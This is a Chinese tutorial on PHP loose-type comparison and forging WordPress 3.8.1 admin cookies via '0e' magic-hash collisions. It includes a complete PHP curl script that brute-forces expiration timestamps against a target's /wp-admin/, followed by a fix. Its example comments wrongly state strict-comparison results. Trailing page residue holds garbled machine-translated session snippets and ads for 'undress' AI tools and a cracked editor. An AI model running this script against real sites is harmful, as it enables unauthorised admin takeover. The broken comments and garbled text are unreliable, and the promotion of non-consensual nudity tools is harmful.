PHP弱类型:WordPress Cookie伪造,wordpresscookie
1 PHP弱类型
PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。
<span>1</span> <?<span>php </span><span>2</span> <span>$a</span> = 3<span>; </span><span>3</span> <span>$b</span> = '3vic'<span>; </span><span>4</span> <span>var_dump</span>(<span>$a</span> == <span>$b</span>);<span>//</span><span>true</span> <span>5</span> <span>var_dump</span>(<span>$a</span> != <span>$b</span>);<span>//</span><span>false</span> <span>6</span> <span>var_dump</span>(<span>$a</span> === <span>$b</span>);<span>//</span><span>true</span> <span>7</span> <span>var_dump</span>(<span>$a</span> !== <span>$b</span>);<span>//</span><span>false</span> <span>8</span> ?>
说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字('3vic' -> 3),如果不是数字开头,那么就会转换成0('vic' -> 0)
2 WordPress代码
- WordPress 3.8.1 与 WordPress 3.8.2 部分代码区别
<span>1</span> <?<span>php
</span><span>2</span> <span>//</span><span> WordPress 3.8.1</span>
<span>3</span> <span>if</span> (<span>$hmac</span> != <span>$hash</span><span>) {}
</span><span>4</span> <span>//</span><span> WordPress 3.8.2</span>
<span>5</span> <span>if</span> ( hash_hmac('md5', <span>$hmac</span>, <span>$key</span>) !== hash_hmac('md5', <span>$hash</span>, <span>$key</span><span>) ) {}
</span><span>6</span> ?>
- Cookie 组成
客户端后台只验证其中的一条Cookie,如下所示
wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span>1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl) 其中siteurl为WordPress的网址,此处网站地址为<span>http://www.test.ichunqiu</span>,md5加密后为<span>c47f4a97d0321c1980bb76fc00d1e78f</span>,其它部分也可省。
类型 用户名 过期时间 登录成功服务器端赋予客户端的hash值
| 对应变量 | $username | $expiration | $hmac |
| cookies | admin | 1433403595 | cf50f3b50eed94dd0fdc3d3ea2c7bbb |
- 分析验证登录
代码 wp-includes/pluggable.php 第543-549行
<span>1</span> <?<span>php
</span><span>2</span> <span>$key</span> = wp_hash(<span>$username</span> . <span>$pass_frag</span> . '|' . <span>$expiration</span>, <span>$scheme</span><span>);
</span><span>3</span> <span>$hash</span> = hash_hmac('md5', <span>$username</span> . '|' . <span>$expiration</span>, <span>$key</span><span>);
</span><span>4</span> <span>if</span> ( <span>$hmac</span> != <span>$hash</span><span> ) {
</span><span>5</span> do_action('auth_cookie_bad_hash', <span>$cookie_elements</span><span>);
</span><span>6</span> <span>return</span> <span>false</span><span>;
</span><span>7</span> }
在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration是可控的,所以我们可以从改变 <span>$expiration </span>的方法来改变$hash。
- 结合PHP Hash 比较缺陷分析 WordPress
有以下几种可能使 $hmac == $hash 为真,字符串完全相等或者 $hmac 等于0的同时 <span>$hash</span> 为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0,然后在if ( $hmac != $hash ) {的上面一行写入<span>var_dump($hmac);die()</span>;发现打印出来 $hmac 的结果是 string '0'而不是int 0, 那么有没有方法使字符串识别为整数呢,代码如下:
<span>1</span> <?<span>php
</span><span>2</span> <span>var_dump</span>('0' == '0e156464513131');<span>//</span><span>true</span>
其中的 0e156464513131 会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash 以0e开头后面全是数字时就会与 <span>$hmac</span> 的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。
3 测试脚本
通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。
<span> 1</span> <?<span>php
</span><span> 2</span> <span>/*</span>
<span> 3</span>
<span> 4</span> <span>本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
</span><span> 5</span> <span>传入两个值
</span><span> 6</span> <span> WordPress 的主页 $host
</span><span> 7</span> <span> 管理员用户名 $root
</span><span> 8</span> <span>*/</span>
<span> 9</span> <span>header</span>("Content-type:text/html;charset=utf-8"<span>);
</span><span>10</span>
<span>11</span> <span>$host</span> = 'http://xxx.xxx.xxx';<span>//</span><span>主页地址 结尾不带'/'</span>
<span>12</span> <span>$root</span> = 'user';<span>//</span><span>管理员用户名</span>
<span>13</span>
<span>14</span> <span>$url</span> = <span>$host</span>.'/wp-admin/';<span>//</span><span>后台管理地址 </span>
<span>15</span> <span>$sitehash</span>=<span>md5</span>(<span>$host</span><span>);
</span><span>16</span>
<span>17</span> <span>echo</span> "\nWelcome\n\n"<span>;
</span><span>18</span> <span>//</span><span>通过时间戳暴力破解cookie 实现伪造cookie</span>
<span>19</span> <span>for</span>(<span>$i</span>=1500000000;<span>$i</span><1600000000;<span>$i</span>++<span>){
</span><span>20</span> <span>$cookie</span> = "wordpress_".<span>$sitehash</span>."=".<span>$root</span>."|".<span>$i</span>."|0;";<span>//</span><span>组合构造cookie</span>
<span>21</span> <span>$header</span> = <span>array</span><span>(
</span><span>22</span> "Content-Type:application/x-www-form-urlencoded",
<span>23</span> 'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
<span>24</span> "Cookie:".<span>$cookie</span>,
<span>25</span> <span> );
</span><span>26</span>
<span>27</span> <span>$curl</span> = curl_init(); <span>//</span><span> 启动一个CURL会话 </span>
<span>28</span> curl_setopt(<span>$curl</span>, CURLOPT_URL, <span>$url</span>); <span>//</span><span> 要访问的地址</span>
<span>29</span> curl_setopt(<span>$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span>//</span><span> 使用自动跳转 </span>
<span>30</span> curl_setopt(<span>$curl</span>, CURLOPT_AUTOREFERER, 1); <span>//</span><span> 自动设置Referer </span>
<span>31</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTPGET, <span>true</span>); <span>//</span><span> 发送一个常规的Post请求 </span>
<span>32</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTPHEADER, <span>$header</span>); <span>//</span><span> 读取上面所储存的Cookie信息 </span>
<span>33</span> curl_setopt(<span>$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span>//</span><span> 获取的信息以文件流的形式返回 </span>
<span>34</span> curl_setopt(<span>$curl</span>, CURLOPT_HEADER, <span>false</span><span>);
</span><span>35</span> curl_setopt(<span>$curl</span>, CURLOPT_HEADER, 0<span>);
</span><span>36</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span>//</span><span>让curl自动选择版本</span>
<span>37</span> <span>$tmpInfo</span> = curl_exec(<span>$curl</span>); <span>//</span><span> 执行操作</span>
<span>38</span> <span>if</span> (curl_errno(<span>$curl</span><span>)) {
</span><span>39</span> <span>echo</span> 'Errno'.curl_error(<span>$curl</span><span>);
</span><span>40</span> <span> }
</span><span>41</span> curl_close(<span>$curl</span>); <span>//</span><span> 关闭CURL会话
</span><span>42</span>
<span>43</span> <span> //匹配结果</span>
<span>44</span> <span>if</span>(<span>strstr</span>(<span>$tmpInfo</span>,'我们准备了几个链接供您开始'<span>)){
</span><span>45</span> <span>echo</span> "\n".'success : '.<span>$cookie</span>."\n\n"<span>;
</span><span>46</span> <span>break</span><span>;
</span><span>47</span> }<span>else</span><span>{
</span><span>48</span> <span>echo</span> 'fail : '.<span>$cookie</span>."\n"<span>;
</span><span>49</span> <span> }
</span><span>50</span>
<span>51</span> <span> }
</span><span>52</span> ?>
说明:理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 <span>$expiration </span>几率极低。
5 修复方案
PHP 中使用的哈希比较函数,将其中的 == , != 分别更改为 === 和 !== 或者 将比较的两个变量使用MD5再加密一次。
学习笔记:http://ichunqiu.com/course/167
絕對會話超時有什麼區別?May 03, 2025 am 12:21 AM絕對會話超時從會話創建時開始計時,閒置會話超時則從用戶無操作時開始計時。絕對會話超時適用於需要嚴格控制會話生命週期的場景,如金融應用;閒置會話超時適合希望用戶長時間保持會話活躍的應用,如社交媒體。
如果會話在服務器上不起作用,您將採取什麼步驟?May 03, 2025 am 12:19 AM服務器會話失效可以通過以下步驟解決:1.檢查服務器配置,確保會話設置正確。 2.驗證客戶端cookies,確認瀏覽器支持並正確發送。 3.檢查會話存儲服務,如Redis,確保其正常運行。 4.審查應用代碼,確保會話邏輯正確。通過這些步驟,可以有效診斷和修復會話問題,提升用戶體驗。
session_start()函數的意義是什麼?May 03, 2025 am 12:18 AMsession_start()iscucialinphpformanagingusersessions.1)ItInitiateSanewsessionifnoneexists,2)resumesanexistingsessions,and3)setsasesessionCookieforContinuityActinuityAccontinuityAcconActInityAcconActInityAcconAccRequests,EnablingApplicationsApplicationsLikeUseAppericationLikeUseAthenticationalticationaltication and PersersonalizedContentent。
為會話cookie設置httponly標誌的重要性是什麼?May 03, 2025 am 12:10 AM設置httponly標誌對會話cookie至關重要,因為它能有效防止XSS攻擊,保護用戶會話信息。具體來說,1)httponly標誌阻止JavaScript訪問cookie,2)在PHP和Flask中可以通過setcookie和make_response設置該標誌,3)儘管不能防範所有攻擊,但應作為整體安全策略的一部分。
PHP會議在網絡開發中解決了什麼問題?May 03, 2025 am 12:02 AMphpsessions solvathepromblymaintainingStateAcrossMultipleHttpRequestsbyStoringDataTaNthEserVerAndAssociatingItwithaIniquesestionId.1)他們儲存了AtoredAtaserver side,通常是Infilesordatabases,InseasessessionIdStoreDistordStoredStoredStoredStoredStoredStoredStoreDoreToreTeReTrestaa.2)
您如何開始PHP會話?May 02, 2025 am 12:16 AMtostartaphpsession,usesesses_start()attheScript'Sbeginning.1)placeitbeforeanyOutputtosetThesessionCookie.2)useSessionsforuserDatalikeloginstatusorshoppingcarts.3)regenerateSessiveIdStopreventFentfixationAttacks.s.4)考慮使用AttActAcks.s.s.4)
什麼是會話再生,如何提高安全性?May 02, 2025 am 12:15 AM會話再生是指在用戶進行敏感操作時生成新會話ID並使舊ID失效,以防會話固定攻擊。實現步驟包括:1.檢測敏感操作,2.生成新會話ID,3.銷毀舊會話ID,4.更新用戶端會話信息。
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
熱工具
EditPlus 中文破解版
體積小,語法高亮,不支援程式碼提示功能
SecLists
SecLists是最終安全測試人員的伙伴。它是一個包含各種類型清單的集合,這些清單在安全評估過程中經常使用,而且都在一個地方。 SecLists透過方便地提供安全測試人員可能需要的所有列表,幫助提高安全測試的效率和生產力。清單類型包括使用者名稱、密碼、URL、模糊測試有效載荷、敏感資料模式、Web shell等等。測試人員只需將此儲存庫拉到新的測試機上,他就可以存取所需的每種類型的清單。
MinGW - Minimalist GNU for Windows
這個專案正在遷移到osdn.net/projects/mingw的過程中,你可以繼續在那裡關注我們。 MinGW:GNU編譯器集合(GCC)的本機Windows移植版本,可自由分發的導入函式庫和用於建置本機Windows應用程式的頭檔;包括對MSVC執行時間的擴展,以支援C99功能。 MinGW的所有軟體都可以在64位元Windows平台上運作。
WebStorm Mac版
好用的JavaScript開發工具
ZendStudio 13.5.1 Mac
強大的PHP整合開發環境
